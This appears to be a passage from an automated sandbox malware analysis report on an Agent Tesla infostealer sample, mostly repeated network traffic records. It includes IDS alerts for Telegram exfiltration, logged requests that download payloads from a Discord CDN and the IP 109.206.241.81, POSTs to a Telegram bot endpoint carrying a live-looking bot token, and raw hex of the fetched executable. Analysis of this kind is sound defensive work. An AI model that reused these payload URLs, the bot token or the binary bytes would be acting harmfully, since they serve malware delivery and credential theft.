                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49183 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 162.159.134.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 162.159.133.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 162.159.135.233:443
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 109.206.241.81:80
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 109.206.241.81:80

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49175 -> 149.154.167.220:443
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7964e1c1748cHost: api.telegram.orgContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7966a100275cHost: api.telegram.orgContent-Length: 5245Expect: 100-continue
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da7965034df172Host: api.telegram.orgContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da79653dcfca72Host: api.telegram.orgContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da796756c9caf4Host: api.telegram.orgContent-Length: 5245Expect: 100-continue
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /htdocs/eZYWw.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:18:10 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 07 Aug 2022 10:26:43 GMTETag: "34400-5e5a422bc1ac2"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:18:38 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 07 Aug 2022 10:26:43 GMTETag: "34400-5e5a422bc1ac2"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:18:44 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 07 Aug 2022 10:26:43 GMTETag: "34400-5e5a422bc1ac2"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 109.206.241.81 109.206.241.81
                  Source: Client.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.81/htdocs/eZYWw.exe
                  Source: Client.exe, 00000009.00000002.928434749.0000000002140000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984981021.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1002192486.0000000002680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.81P
                  Source: RegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: RegSvcs.exe, 0000000A.00000002.987370165.0000000002433000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987738034.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004119110.0000000002196000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194992268.00000000023F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194571279.00000000023A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
